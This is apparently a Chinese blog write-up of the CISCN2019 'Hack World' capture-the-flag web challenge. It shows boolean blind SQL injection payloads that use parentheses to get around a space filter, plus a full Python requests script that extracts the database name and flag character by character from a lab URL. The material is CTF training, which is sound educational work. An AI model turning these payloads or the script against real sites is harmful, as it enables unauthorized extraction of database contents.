[CISCN2019 华北赛区]Hack World 1

原创 于 2021-05-25 19:37:25 发布 · 235 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

该博客讲述了通过Python脚本实现布尔盲注的自动化攻击过程,利用ASCII编码绕过过滤,寻找数据库中的敏感信息。在Flag表的flag字段中获取目标数据,最终成功解密出flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[CISCN2019 华北赛区 Day2 Web1]Hack World 1

经过测试为布尔盲注

此例不使用二分法 经过fuzzing测试
ascii没有被过滤,substr也没有!!空格被过滤可以使用()代替,,<>也没有被过滤,=也没有

爆数据库 payload

(ascii(substr(database(),%d,1))=%d)
其中%d为变量

题目提示在flag表中flag字段就是我们想要的东西

构造payload

data = {"id": "(ascii(substr((select(flag)from(flag)),%d,1))=%d)" % (i, j)}

编写python自动化攻击脚本

import requests

url = "http://7bfecddb-1daa-49b4-bec9-49bdc10155d7.node3.buuoj.cn/index.php"

flag = 'Hello, glzjin wants a girlfriend.'

final = ""

for i in range(1, 100):

 stop = 0
 for j in range(32, 129):
     stop = j
     data = {"id": "(ascii(substr(database(),%d,1))=%d)" % (i, j)}
     # data = {"id": "(ascii(substr((select(flag)from(flag)),%d,1))=%d)" % (i, j)}
     re = requests.post(url, data=data).text
     if flag in re:
         final += chr(j)
         print(final)
         break

 if stop >= 128:
     print("*" * 50)
     print(final)
     break

执行脚本 得到flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值